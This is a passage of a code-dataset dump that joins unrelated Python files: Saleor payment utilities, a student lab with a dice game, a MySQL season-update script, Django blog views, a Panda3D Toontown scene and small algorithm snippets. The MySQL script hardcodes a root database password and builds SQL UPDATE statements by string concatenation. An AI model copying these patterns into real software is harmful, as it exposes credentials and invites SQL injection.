error_msg = 'Gateway response validation failed'\n logger.exception(error_msg)\n gateway_response = None # Set response empty as the validation failed\n except Exception:\n error_msg = 'Gateway encountered an error'\n logger.exception(error_msg)\n finally:\n if not isinstance(gateway_response, list):\n gateway_response = [gateway_response]\n transactions = []\n for response in gateway_response:\n transactions.append(create_transaction(\n payment=payment,\n kind=default_transaction_kind,\n payment_information=payment_information,\n error_msg=error_msg,\n gateway_response=response))\n\n for transaction in transactions:\n if not transaction.is_success:\n # Attempt to get errors from response, if none raise a generic one\n raise PaymentError(transaction.error or GENERIC_TRANSACTION_ERROR)\n\n return transactions[-1]\n\n\ndef validate_gateway_response(responses):\n \"\"\"Validates response to be a correct format for Saleor to process.\"\"\"\n if not isinstance(responses, (dict, list)):\n raise GatewayError('Gateway needs to return a dictionary or a list')\n\n if not isinstance(responses, list):\n responses = [responses]\n\n field_types = {\n 'amount': Decimal,\n 'currency': str,\n 'is_success': bool,\n 'kind': str,\n 'transaction_id': str,\n 'error': (type(None), str),\n }\n\n for response in responses:\n if not REQUIRED_GATEWAY_KEYS.issubset(response):\n raise GatewayError(\n 'Gateway response needs to contain following keys: {}'.format(\n sorted(REQUIRED_GATEWAY_KEYS)))\n\n for name, value in response.items():\n if name in field_types:\n if not isinstance(value, field_types[name]):\n raise GatewayError('{} must be of type {}, was {}'.format(\n name, field_types[name], type(value)))\n\n if response['kind'] not in ALLOWED_GATEWAY_KINDS:\n raise GatewayError(\n 'Gateway response kind must be one of {}'.format(\n sorted(ALLOWED_GATEWAY_KINDS)))\n\n if response['currency'] != settings.DEFAULT_CURRENCY:\n logger.warning('Transaction currency is different than Saleor\\'s.')\n\n try:\n json.dumps(response, cls=DjangoJSONEncoder)\n except (TypeError, ValueError):\n raise GatewayError(\n 'Gateway response needs to be json serializable')\n\n\ndef _gateway_postprocess(transaction, payment):\n transaction_kind = transaction.kind\n\n if transaction_kind in [TransactionKind.CHARGE, TransactionKind.CAPTURE]:\n payment.captured_amount += transaction.amount\n\n # Set payment charge status to fully charged\n # only if there is no more amount needs to charge\n payment.charge_status = ChargeStatus.PARTIALLY_CHARGED\n if payment.get_charge_amount() <= 0:\n payment.charge_status = ChargeStatus.FULLY_CHARGED\n\n payment.save(update_fields=['charge_status', 'captured_amount'])\n task = payment.task\n if task and task.is_fully_paid():\n handle_fully_paid_order(task)\n\n elif transaction_kind == TransactionKind.VOID:\n payment.is_active = False\n payment.save(update_fields=['is_active'])\n\n elif transaction_kind == TransactionKind.REFUND:\n changed_fields = ['captured_amount']\n payment.captured_amount -= transaction.amount\n payment.charge_status = ChargeStatus.PARTIALLY_REFUNDED\n if payment.captured_amount <= 0:\n payment.charge_status = ChargeStatus.FULLY_REFUNDED\n payment.is_active = False\n changed_fields += ['charge_status', 'is_active']\n payment.save(update_fields=changed_fields)\n\n\n@require_active_payment\ndef gateway_process_payment(\n payment: Payment, payment_token: str) -> Transaction:\n \"\"\"Performs whole payment process on a gateway.\"\"\"\n transaction = call_gateway(\n operation_type=OperationType.PROCESS_PAYMENT,\n payment=payment, payment_token=payment_token, amount=payment.total)\n\n _gateway_postprocess(transaction, payment)\n return transaction\n\n\n@require_active_payment\ndef gateway_charge(\n payment: Payment, payment_token: str,\n amount: Decimal = None) -> Transaction:\n \"\"\"Performs authorization and capture in a single run.\n\n For gateways not supporting the authorization it should be a\n dedicated CHARGE transaction.\n\n For gateways not supporting capturing without authorizing,\n it should create two transaction - auth and capture, but only the last one\n is returned.\n \"\"\"\n if amount is None:\n amount = payment.get_charge_amount()\n clean_charge(payment, amount)\n\n transaction = call_gateway(\n operation_type=OperationType.CHARGE,\n payment=payment, payment_token=payment_token, amount=amount)\n\n _gateway_postprocess(transaction, payment)\n return transaction\n\n\n@require_active_payment\ndef gateway_authorize(payment: Payment, payment_token: str) -> Transaction:\n \"\"\"Authorizes the payment and creates relevant transaction.\n\n Args:\n - payment_token: One-time-use reference to payment information.\n \"\"\"\n clean_authorize(payment)\n\n return call_gateway(\n operation_type=OperationType.AUTH,\n payment=payment, payment_token=payment_token)\n\n\n@require_active_payment\ndef gateway_capture(payment: Payment, amount: Decimal = None) -> Transaction:\n \"\"\"Captures the money that was reserved during the authorization stage.\"\"\"\n if amount is None:\n amount = payment.get_charge_amount()\n clean_capture(payment, amount)\n\n auth_transaction = payment.transactions.filter(\n kind=TransactionKind.AUTH, is_success=True).first()\n if auth_transaction is None:\n raise PaymentError('Cannot capture unauthorized transaction')\n payment_token = auth_transaction.token\n\n transaction = call_gateway(\n operation_type=OperationType.CAPTURE,\n payment=payment, payment_token=payment_token, amount=amount)\n\n _gateway_postprocess(transaction, payment)\n return transaction\n\n\n@require_active_payment\ndef gateway_void(payment) -> Transaction:\n if not payment.can_void():\n raise PaymentError('Only pre-authorized transactions can be voided.')\n\n auth_transaction = payment.transactions.filter(\n kind=TransactionKind.AUTH, is_success=True).first()\n if auth_transaction is None:\n raise PaymentError('Cannot void unauthorized transaction')\n payment_token = auth_transaction.token\n\n transaction = call_gateway(\n operation_type=OperationType.VOID,\n payment=payment, payment_token=payment_token)\n\n _gateway_postprocess(transaction, payment)\n return transaction\n\n\n@require_active_payment\ndef gateway_refund(payment, amount: Decimal = None) -> Transaction:\n \"\"\"Refunds the charged funds back to the customer.\n Refunds can be total or partial.\n \"\"\"\n if amount is None:\n # If no amount is specified, refund the maximum possible\n amount = payment.captured_amount\n\n if not payment.can_refund():\n raise PaymentError('This payment cannot be refunded.')\n\n if amount <= 0:\n raise PaymentError('Amount should be a positive number.')\n if amount > payment.captured_amount:\n raise PaymentError('Cannot refund more than captured')\n\n transaction = payment.transactions.filter(\n kind__in=[TransactionKind.CAPTURE, TransactionKind.CHARGE],\n is_success=True).first()\n if transaction is None:\n raise PaymentError('Cannot refund uncaptured/uncharged transaction')\n payment_token = transaction.token\n\n transaction = call_gateway(\n operation_type=OperationType.REFUND,\n payment=payment, payment_token=payment_token, amount=amount)\n\n _gateway_postprocess(transaction, payment)\n return transaction\n","sub_path":"remote_works/payment/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":18328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"144432895","text":"# standard_library.py\n\"\"\"Python Essentials: The Standard Library.\nZachary Brown\nMath 321 Lab Section 002\n08/22/2018\n\"\"\"\nimport calculator as calc\nfrom math import sqrt\n\nfrom itertools import combinations as combos\nfrom itertools import chain\n\nimport random as rand\nimport time\nimport sys\nimport box #as box\n\n\n# Problem 1\ndef prob1(L):\n \"\"\"Return the minimum, maximum, and average of the entries of L\n (in that order).\n \"\"\"\n return min(L), max(L), (sum(L)/(1.0*len(L)))\n #raise NotImplementedError(\"Problem 1 Incomplete\")\n\n\n# Problem 2\ndef prob2():\n \"\"\"Determine which Python objects are mutable and which are immutable.\n Test numbers, strings, lists, tuples, and sets. Print your results.\n \"\"\"\n num1 = 1.5\n num2 = num1\n num1 += 1\n if num1 == num2:\n print(\"In python3, numbers are mutable.\")\n else:\n print(\"In python3, numbers aren't mutable.\")\n\n str1 = \"hello\"\n str2 = str1\n str2 += \" mom\"\n if str1 == str2:\n print(\"In python3, strings are mutable.\")\n else:\n print(\"In python3, strings aren't mutable.\")\n\n\n list1 = [1, 2, 3]\n list2 = list1\n list2.append(4)\n if list1 == list2:\n print(\"In python3, lists are mutable.\")\n else:\n print(\"In python3, lists aren't mutable.\")\n\n\n tup1 = (1, 2, 3)\n tup2 = tup1\n tup2 += (1,)\n if tup1 == tup2:\n print(\"In python3, tuples are mutable.\")\n else:\n print(\"In python3, tuples aren't mutable.\")\n\n\n set1 = set([1, 2, 3])\n set2 = set1\n set2.add(4)\n if set1 == set2:\n print(\"In python3, sets are mutable.\")\n else:\n print(\"In python3, sets aren't mutable.\")\n\n #raise NotImplementedError(\"Problem 2 Incomplete\")\n\n\n# Problem 3\ndef hypot(a, b):\n \"\"\"Calculate and return the length of the hypotenuse of a right triangle.\n Do not use any functions other than those that are imported from your\n 'calculator' module.\n\n Parameters:\n a: the length one of the sides of the triangle.\n b: the length the other non-hypotenuse side of the triangle.\n Returns:\n The length of the triangle's hypotenuse.\n \"\"\"\n a_sqr = calc.prod(a, a)\n b_sqr = calc.prod(b, b)\n sqr_sum = calc.add(a_sqr, b_sqr)\n return sqrt(sqr_sum)\n # raise NotImplementedError(\"Problem 3 Incomplete\")\n\n\n# Problem 4\ndef power_set(A):\n \"\"\"Use itertools to compute the power set of A.\n\n Parameters:\n A (iterable): a str, list, set, tuple, or other iterable collection.\n\n Returns:\n (list(sets)): The power set of A as a list of sets.\n \"\"\"\n tuple_list = list(chain.from_iterable([list(combos(A, i)) for i in range(0, len(A)+1)]))\n return [set(item) for item in tuple_list]\n #raise NotImplementedError(\"Problem 4 Incomplete\")\n\n# Problem 5: Implement shut the box.\ndef main():\n if len(sys.argv[0:]) == 3:# is filename after standard_library.py or not???\n filename = sys.argv[0]\n player_name = sys.argv[1]\n time_lim = float(sys.argv[2]) # measured in seconds\n\n time_out = False\n time_lapsed = 0\n time_remaining = time_lim\n total_time_played = 0\n\n nums_remaining = [1, 2, 3, 4, 5, 6, 7, 8, 9]\n no_sum_possible = False\n\n roll_valid = True\n\n while roll_valid and (len(nums_remaining) > 0) and (not time_out):\n roll_sum = rand.randint(1, 6)\n if sum(nums_remaining) > 6:\n roll_sum += rand.randint(1, 6)\n roll_valid = box.isvalid(roll_sum, nums_remaining)\n\n print(\"Numbers remaining: \", nums_remaining)\n print(\"Roll sum: \", roll_sum)\n\n if roll_valid:\n ints_to_eliminate = []\n\n while (len(ints_to_eliminate) <= 0 and not time_out):\n start = time.time()\n player_input = input(\"Enter numbers to eliminate: \")\n stop = time.time()\n time_lapsed = stop - start\n time_remaining = time_remaining - time_lapsed\n total_time_played += time_lapsed\n\n if time_remaining <= 0:\n time_out = True\n else:\n ints_to_eliminate = box.parse_input(player_input, nums_remaining)\n if len(ints_to_eliminate) <= 0:\n print(\"Invalid input - your entry must be spaced integers contained in \", nums_remaining, \"! PLEASE TRY AGAIN!\\n\")\n for num in ints_to_eliminate:\n if num in nums_remaining:\n nums_remaining.remove(num)\n \n if time_out:\n print(\"Time out! Game Over!\")\n elif not roll_valid:\n print(\"Invalid roll! Game Over!\")\n \n print(\"Score for player \", player_name, \": \", sum(nums_remaining), \" points\")\n print(\"Time played: \", round(total_time_played), \" seconds.\")\n\n if len(nums_remaining) == 0:\n print(\"You WON!!! Congratulations!\")\n elif time_out:\n print(\"You lost SLOW POKE! Try to actually, you know, keep up next time ;)\")\n elif not roll_valid:\n print(\"You lost, but hey, it was just because of a dice roll. Better luck next time!\")\n else:\n print(\"You lost! Better luck next time!\")\n pass\n\nif __name__ == '__main__':\n main()\n","sub_path":"acme_lab2_std_lib_draft/standard_library.py","file_name":"standard_library.py","file_ext":"py","file_size_in_byte":5364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"614319807","text":"\"\"\"\nscript designed to update the season field within regularseason tables\nchanges from '17-'18 to 2018 to make querying and joining easier\n\"\"\"\n\nimport pymysql\nimport logging\nimport datetime\n\ndef find_distinct_seasons(connection):\n select_dates = 'select distinct season from RegularSeasonAverages \\\n union distinct \\\n select distinct season from RegularSeasonTotals \\\n union distinct \\\n select distinct season from RegularSeasonMiscTotals'\n return sql_execute(connection, select_dates)\n\ndef sql_execute(connection, query):\n exe = connection.cursor()\n exe.execute(query)\n return exe.fetchall()\n\ndef parse_dates(dates):\n date_dict = {}\n for date in dates:\n date_dict[date[0]] = date[0][:2]+date[0][-2:]\n return date_dict\n\ndef generate_update_statements(connection, date_dict, table_list):\n exe = connection.cursor()\n for table in table_list:\n for date in date_dict:\n exe.execute(\"update \" + table + \" set season = \" + str(date_dict[date]) + \" where season = '\" + str(date) + \"'\") #'\\\\\" + str(date[:4]) + \"\\\\\" + str(date[4:]) + \"'\")\n return\n\ndef main():\n logging.basicConfig(filename='nba_stat_incrementals_log.log', filemode='a', level=logging.INFO)\n myConnection = pymysql.connect(host=\"localhost\", user=\"root\", password=\"Sk1ttles\", db=\"nba_stats_staging\", autocommit=True)\n table_list = ['regularseasonaverages', 'RegularSeasonTotals', 'RegularSeasonMiscTotals']\n logging.info('Updating ESPN seasons {}'.format(str(datetime.datetime.now())))\n dates = find_distinct_seasons(myConnection)\n date_dict = parse_dates(dates)\n generate_update_statements(myConnection, date_dict, table_list)\n logging.info('ESPN seasons update completed successfully {}'.format(str(datetime.datetime.now())))\n\nif __name__ == '__main__':\n main()\n","sub_path":"Incremental Pipelines/espn_update_season_date.py","file_name":"espn_update_season_date.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"529054005","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on July 2017\n\n@author: JulienWuthrich\n\"\"\"\nfrom setuptools import setup\n\nREQUIREMENTS = [\"numpy\", \"pandas\", \"tqdm\", \"grequests\", \"flask\"]\n\nsetup(\n name='pytools',\n packages=['pytools'],\n version='0.1.0',\n url=\"https://github.com/Jwuthri/PythonTools.git\",\n download_url =\"https://github.com/Jwuthri/PythonTools/archive/0.1.tar.gz\",\n description=\"Some snippets for python\",\n author=\"Julien WUTHRICH\",\n install_requires=REQUIREMENTS,\n license='MIT license',\n keywords=[\"date\", \"time\", \"log\", \"pandas\", \"list\", \"requests\"],\n classifiers=[]\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"389147174","text":"\"\"\"\nCopyright 2019 Secure, Reliable, and Intelligent Systems Lab, ETH Zurich\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n http://www.apache.org/licenses/LICENSE-2.0\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\nimport pprint\nimport argparse\nfrom guidesyn.core.run_model import run_model, run_ablation\nfrom guidesyn.core.arguments import Data, ManualType, DataModeRNN\nimport time\n\n\ndef main():\n start_time = time.time()\n evaluations = [\n (\"MLP\", \"ds\", Data.MANUAL, ManualType.Manual_MLP_OS, DataModeRNN.UNUSED),\n (\"CNN\", \"ds\", Data.IMAGE, ManualType.UNUSED, DataModeRNN.UNUSED),\n (\"RNN\", \"ds\", Data.MANUAL, ManualType.Manual_RNN_OS, DataModeRNN.FULL),\n (\"EnsembleRnnCnn\", \"ds\", Data.BOTH, ManualType.Manual_RNN_OS, DataModeRNN.FULL),\n (\"MLP\", \"dsplus\", Data.MANUAL, ManualType.Manual_MLP_MS, DataModeRNN.UNUSED),\n (\"CNN\", \"dsplus\", Data.IMAGE, ManualType.UNUSED, DataModeRNN.UNUSED),\n (\"RNN\", \"dsplus\", Data.MANUAL, ManualType.Manual_RNN_MS, DataModeRNN.FULL),\n (\"EnsembleRnnCnn\", \"dsplus\", Data.BOTH, ManualType.Manual_RNN_MS, DataModeRNN.FULL)\n ]\n\n parser = argparse.ArgumentParser(description='Experiment specifications')\n parser.add_argument('--gpus', type=str, default=\"-1\", help='GPU to be used')\n parser.add_argument('--model_path', type=str, default=\"./core/saved_modelsPaper/\",\n help='Path to load models from/save to')\n parser.add_argument('--should_cache', type=bool, default=\"False\", help='Should cache neural net input.')\n args = parser.parse_args()\n gpus = args.gpus.split(\",\")\n return_dict = {}\n\n print(\"Ablation study for {} models \".format(len(evaluations)))\n for i, (model, dataset, dataType, manualType, DataModeRnn) in enumerate(evaluations):\n print(\"{}.) Ablation study: {} trained on {}\".format(i, model, dataset), flush=True)\n run_model(model, dataset, dataType, manualType, DataModeRnn, \"models-acc\", return_dict, gpus[0], 42,\n run_ablation, False, args.model_path, args.should_cache)\n print(\"\\n----------------------------------------\")\n\n end_time = time.time()\n pp = pprint.PrettyPrinter(indent=4)\n pp.pprint(return_dict)\n print(\"Evaluating ablation dataset took {}, \".format(round(end_time - start_time, 3)))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"guidesyn/run_ablation.py","file_name":"run_ablation.py","file_ext":"py","file_size_in_byte":2733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"422373186","text":"# coding:utf-8\n'''\n@Copyright:LintCode\n@Author: justice_103\n@Problem: http://www.lintcode.com/problem/two-sum\n@Language: Python\n@Datetime: 15-08-05 12:50\n'''\n\nclass Solution:\n \"\"\"\n @param numbers : An array of Integer\n @param target : target = numbers[index1] + numbers[index2]\n @return : [index1 + 1, index2 + 1] (index1 < index2)\n \"\"\"\n def twoSum(self, numbers, target):\n # write your code here\n n=len(numbers)\n \n for i in range(n):\n for j in range(i+1, n):\n if numbers[i]+numbers[j]==target:\n return [i+1,j+1]\n \n return None\n","sub_path":"lintcode/56_two-sum/two-sum.py","file_name":"two-sum.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"271114787","text":"from direct.directbase.DirectStart import *\nfrom direct.actor.Actor import Actor\nfrom pandac.PandaModules import *\nfrom direct.task import Task\nimport math\nfrom math import pi, sin, cos\nfrom direct.showbase.ShowBase import ShowBase\nfrom direct.task import Task\nfrom direct.interval.IntervalGlobal import *\nfrom pandac.PandaModules import Point3\nfrom pandac.PandaModules import *\nfrom panda3d.core import CollisionTraverser,CollisionNode\nfrom panda3d.core import CollisionHandlerQueue,CollisionRay\nfrom panda3d.core import Filename,AmbientLight,DirectionalLight\nfrom panda3d.core import PandaNode,NodePath,Camera,TextNode\nfrom panda3d.core import Vec3,Vec4,BitMask32\nfrom direct.showbase.Transitions import *\nfrom direct.gui.DirectGui import *\nfrom direct.actor.Actor import Actor\nfrom direct.showbase.DirectObject import DirectObject\nfrom direct.filter.CommonFilters import *\nfrom panda3d.ai import *\nimport sys\n\n\nSKY = loader.loadModel('phase_3.5/models/props/TT_sky.bam')\nSKY.reparentTo(render)\nterrain = loader.loadModel('phase_4/models/neighborhoods/toontown_central_full.bam')\nterrain.reparentTo(render)\nterrain.find('**/hill').hide()\n\nMewtastic = Actor({'Torso':'phase_3/models/char/tt_a_chr_dgm_shorts_torso_1000.bam', \\\n 'Legs':'phase_3/models/char/tt_a_chr_dgm_shorts_legs_1000.bam'}, \\\n {'Torso':{'Idle': 'phase_3/models/char/tt_a_chr_dgm_shorts_torso_1000.bam', \\\n 'TorsoAnim':'phase_3/models/char/tt_a_chr_dgm_shorts_torso_neutral.bam'}, \\\n 'Legs':{'Idle':'phase_3/models/char/tt_a_chr_dgm_shorts_legs_1000.bam',\n 'LegsAnim':'phase_3/models/char/tt_a_chr_dgm_shorts_legs_neutral.bam'}})\n \nMewtastic.attach('Torso', 'Legs', 'joint_hips')\n \n#Animations\nMewtastic.loop('TorsoAnim')\nMewtastic.loop('LegsAnim')\n \n#Pos, Hpr, Scale, ReparentTo\nMewtastic.setPos(0, 0, 0)\nMewtastic.setHpr(0, 0, 0)\nMewtastic.setScale(0.90)\nMewtastic.reparentTo(render)\n \n#Head\nHead = loader.loadModel('phase_3/models/char/bear-heads-1000.bam')\nHead.find('**/muzzle-short-surprise').hide()\nHead.find('**/muzzle-short-sad').hide()\nHead.find('**/muzzle-short-smile').hide()\nHead.find('**/muzzle-short-neutral').hide()\nHead.find('**/muzzle-short-laugh').hide()\nAngryEyes = loader.loadTexture('lel.jpg')\nHead.find('**/eyes-short').setTexture(AngryEyes, 1)\nHead.find('**/muzzle-long-surprise').hide()\nHead.find('**/muzzle-long-sad').hide()\nHead.find('**/muzzle-long-smile').hide()\nHead.find('**/muzzle-long-angry').hide()\nHead.find('**/muzzle-long-laugh').hide()\nHead.find('**/muzzle-long-neutral').hide()\nHead.find('**/head-long').hide()\nHead.find('**/head-front-long').hide()\nHead.find('**/eyes-long').hide()\nHead.find('**/joint_pupilL_long').hide()\nHead.find('**/joint_pupilR_long').hide()\nHead.find('**/ears-long').hide()\n \nNeck = Mewtastic.find('**/def_head')\nHead.reparentTo(Neck)\n\n#******************************Clothes******************************\n \n \n#Gloves\nGloves = Mewtastic.find('**/hands')\nGloves.setColor(0.99, 0.99, 0.99)\n \n#Sleeves\nSleeves = loader.loadTexture('phase_4/maps/CowboySleeve1.jpg')\nMewtastic.find('**/sleeves').setTexture(Sleeves, 1)\n \n#Shirts\nShirt = loader.loadTexture('phase_4/maps/CowboyShirt1.jpg')\nMewtastic.find('**/torso-top').setTexture(Shirt, 1)\n \n#Shorts\nShorts = loader.loadTexture('phase_4/maps/CowboyShorts1.jpg')\nMewtastic.find('**/torso-bot').setTexture(Shorts, 1)\n \n#Shoes/Boots\nShoes = loader.loadTexture('phase_4/maps/tt_t_chr_avt_acc_sho_converseStyleBlack.jpg')\nMewtastic.find('**/shoes').hide()\nMewtastic.find('**/shoes').hide()\nMewtastic.find('**/boots_long').hide()\nMewtastic.find('**/boots_short').setTexture(Shoes, 1)\nMewtastic.find('**/feet').hide()\n \n#Hats\nHat = loader.loadModel('phase_4/models/accessories/tt_m_chr_avt_acc_hat_pilotsCap.bam')\nHat.reparentTo(Head.find('**/head-short'))\nHat.setPos(0, 0.02, 0.17)\nHat.setHpr(180.00, 333.43, 0)\nHat.setScale(0.43)\n \n#Colors\nHead.find('**/head-short').setColor(0.125, 0.125, 0.125, 1.0)\nHead.find('**/head-front-short').setColor(0.125, 0.125, 0.125, 1.0)\nHead.find('**/ears-short').setColor(0.125, 0.125, 0.125, 1.0)\nMewtastic.find('**/neck').setColor(0.125, 0.125, 0.125, 1.0)\nMewtastic.find('**/arms').setColor(0.125, 0.125, 0.125, 1.0)\nMewtastic.find('**/legs').setColor(0.125, 0.125, 0.125, 1.0)\nMewtastic.find('**/feet').setColor(0.125, 0.125, 0.125, 1.0)\nMewtastic.place()\n\n\n\n#Walk1 = Kart.posInterval (1.00, Point3(0, 0, 3.90))\n#Pace = Sequence(Walk1)\n#Pace.loop()\n\n#Walk1 = Noah.posInterval (1.00, Point3(0, 0, 3.90))\n#Pace = Sequence(Walk1)\n#Pace.loop()\n\n#Walk1 = spin.hprInterval (5.00, Point3(180, 0, 0))\n#Pace = Sequence(Walk1)\n#Pace.loop()\n\n\n\n\nbase.oobe()\nrun()\n\n","sub_path":"projects/old py files/run away.py","file_name":"run away.py","file_ext":"py","file_size_in_byte":4623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"318062019","text":"'''\n\nwritten by Sihyun Jeong (sihyunj@snu.ac.kr)\n\n'''\n \ndef status_comp(lines):\n \n \n wf = open(\"social_status.txt\",\"w\")\n \n indegree = dict()\n outdegree = dict()\n \n for l in lines:\n \n tmp = l.strip('\\n').strip('\\r').split('\\t')\n \n if tmp[1] in indegree.keys():\n indegree[tmp[1]] +=1\n else:\n indegree[tmp[1]] = 1\n\n \n if tmp[0] in outdegree.keys():\n outdegree[tmp[0]] +=1\n else:\n outdegree[tmp[0]] = 1\n \n \n nodes = set(indegree.keys()) | set(outdegree.keys())\n \n statusdict = dict()\n \n for n in nodes:\n \n if n in indegree.keys():\n incnt = indegree[n]\n else:\n incnt = 0\n \n if n in outdegree.keys():\n outcnt = outdegree[n]\n else:\n outcnt = 0\n \n \n #status = float(incnt) / float(outcnt) \n status = float(incnt) / float(incnt+outcnt) #normalized version\n \n del indegree[n]\n del outdegree[n]\n \n statusdict[n] = status\n \n \n \n wf.write(n)\n wf.write('\\t')\n wf.write(str(status))\n wf.write('\\n')\n \n wf.close()\n return statusdict\n \ndef plp(egonet,statusdict):\n \n \n wf = open(\"plp.txt\",\"w\")\n \n for k in egonet.keys():\n \n \n outdegree=0\n positivelink =0\n \n for (i,j) in egonet[k]:\n if i == k:\n outdegree+=1\n \n if statusdict[i] < statusdict[j]:\n positivelink +=1\n \n if outdegree > 0:\n plp = float(positivelink) / float(outdegree)\n \n wf.write(k)\n wf.write('\\t')\n wf.write(str(plp))\n wf.write('\\n')\n \n \n \n ","sub_path":"socialstatus.py","file_name":"socialstatus.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"157358412","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponse\nfrom .models import Post\nfrom django.views.generic import ListView\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin\nfrom django.views.generic import DetailView, UpdateView, DeleteView\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import PostForm\nfrom django.db.models import Q\nfrom django.utils import timezone\n\n\n# Create your views here.\n\ndef home(request):\n posts = Post.objects.all()\n search_query = request.GET.get('q')\n if search_query:\n posts = posts.filter(\n Q(title__icontains = search_query) |\n Q(content__icontains = search_query)\n )\n\n # Top 4 most liked blogs, If possible after the feature of like count is added then \n # add a logic to store all the 4 id's of most liked blogs from the database in a list, then pass all the id's from the list to this 4 query. \n mostliked1 = Post.objects.get(id=6)\n mostliked2 = Post.objects.get(id=5)\n mostliked3 = Post.objects.get(id=4)\n mostliked4 = Post.objects.get(id=3)\n\n context={\n 'posts': posts,\n 'mostliked1':mostliked1,\n 'mostliked2':mostliked2,\n 'mostliked3':mostliked3,\n 'mostliked4':mostliked4,\n }\n return render(request,'blog/home.html', context)\n\n\ndef about(request):\n return render(request,'blog/about.html')\n\n\ndef Profileview(request,name):\n user =User.objects.get(username=name)\n flag = (request.user==Post.author)\n context={\n 'user':user, 'flag':flag \n }\n if request.user!=user:\n return render(request,'user/profile.html', context)\n else:\n context={\n 'posts': Post.objects.all(),'flag':flag \n }\n return render(request,'user/profile.html',context)\n\n\nclass PostDetailView(DetailView):\n model = Post\n def get_object(self):\n obj = super().get_object()\n obj.view_count += 1\n obj.save()\n return obj\n\n\nclass PostUpdateView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):\n model = Post\n fields = ['title', 'image', 'content']\n\n def form_valid(self, form):\n form.instance.author = self.request.user\n return super().form_valid(form)\n\n def test_func(self):\n post = self.get_object()\n if self.request.user == post.author:\n return True\n return False\n\n\nclass PostDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):\n model = Post\n success_url = '/'\n\n def test_func(self):\n post = self.get_object()\n if self.request.user == post.author:\n return True\n return False\n\n\n@login_required\ndef post_create(request):\n form = PostForm(request.POST or None, request.FILES or None)\n if form.is_valid():\n instance = form.save(commit=False)\n instance.author_id = request.user.id\n instance.save()\n messages.success(request, \"Successfully Created\")\n return redirect('blog-home')\n context ={\n \"form\": form\n }\n return render(request, \"blog/post_create.html\", context)\n","sub_path":"mysite/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"610460297","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n def rangeSumBST(self, root: TreeNode, L: int, R: int) -> int:\n # 采用前序遍历的方式\n\n limit = [L, R]\n return self.pre_order(root, limit)\n\n def pre_order(self, node: TreeNode, limit) -> int:\n if not node:\n return 0\n else:\n if limit[0] <= node.val <= limit[1]:\n return self.pre_order(node.left, limit) + \\\n node.val + \\\n self.pre_order(node.right, limit)\n elif node.val < limit[0]:\n return self.pre_order(node.right, limit)\n elif node.val > limit[1]:\n return self.pre_order(node.left, limit)\n\n\nif __name__ == '__main__':\n root = TreeNode(10)\n node1 = TreeNode(5)\n node2 = TreeNode(15)\n node3 = TreeNode(3)\n node4 = TreeNode(7)\n node5 = TreeNode(18)\n\n root.left = node1\n root.right = node2\n node1.left = node3\n node1.right = node4\n node2.right = node5\n\n L = 7\n R = 15\n so = Solution()\n res = so.rangeSumBST(root, L, R)\n print(res)\n","sub_path":"leetcode_3/binary_tree_sum.py","file_name":"binary_tree_sum.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"564047733","text":"import numpy as np\nfrom scipy.sparse.csgraph import minimum_spanning_tree\n\ndef create_mst(dist_matrix):\n \"\"\"For a given distance matrix, returns the unit-distance MST.\"\"\"\n # Use toarray because we want a regular nxn matrix, not the scipy sparse matrix.\n # np.random.seed(1)\n mst = minimum_spanning_tree(dist_matrix).toarray()\n # Set every edge weight to 1.\n mst = np.where(mst > 0, 1, 0)\n # Symmetrize.\n mst += mst.T\n mst = mst.astype('float32')\n return mst\n\n\ndef triu_mask(m, k=0):\n \"\"\"\n For a given matrix m, returns like-sized boolean mask that is true for all\n elements `k` offset from the diagonal.\n \"\"\"\n mask = np.zeros_like(m, dtype=np.bool)\n idx = np.triu_indices_from(m, k=k)\n mask[idx] = True\n return mask\n\n\ndef masked_edges(adj, mask):\n \"\"\"\n For a given adjacency matrix and a like-sized boolean mask, returns a mask\n of the same size that is only true for the unique edges (the upper\n triangle). Assumes a symmetrical adjacency matrix.\n \"\"\"\n return np.logical_and(triu_mask(adj, k=1), mask)\n\n\ndef ordered_edges(distances, mask):\n \"\"\"\n For a given adjacency matrix with `n` edges and a like-sized mask, returns\n an n x 2 array of edges sorted by distance.\n \"\"\"\n # We are only interested in the indices where our mask is truthy.\n # On a boolean array nonzero returns the true indices.\n # indices holds a tuple of arrays, one for each dimension.\n indices = np.nonzero(mask)\n ds = distances[indices]\n # argsort returns the sorted indices of the distances.\n # Note: these are not 